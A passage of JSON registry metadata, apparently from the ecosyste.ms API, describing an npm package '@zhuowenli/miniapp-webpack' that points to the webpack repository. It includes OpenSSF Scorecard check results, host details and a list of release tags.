luowen19920829@gmail.com","url":null,"packages_count":13,"html_url":"https://www.npmjs.com/~luowen","role":null,"created_at":"2022-11-13T09:19:49.276Z","updated_at":"2022-11-13T09:19:49.276Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/luowen/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1381040,"name":"@zhuowenli/miniapp-webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"zhuowenli","versions_count":1,"first_release_published_at":"2020-06-11T02:36:30.032Z","latest_release_published_at":"2020-06-11T02:36:30.032Z","latest_release_number":"4.43.0","last_synced_at":"2026-09-03T00:49:18.312Z","created_at":"2022-04-08T23:07:11.644Z","updated_at":"2026-09-03T00:49:18.312Z","registry_url":"https://www.npmjs.com/package/@zhuowenli/miniapp-webpack","install_command":"npm install @zhuowenli/miniapp-webpack","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"4.43.0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026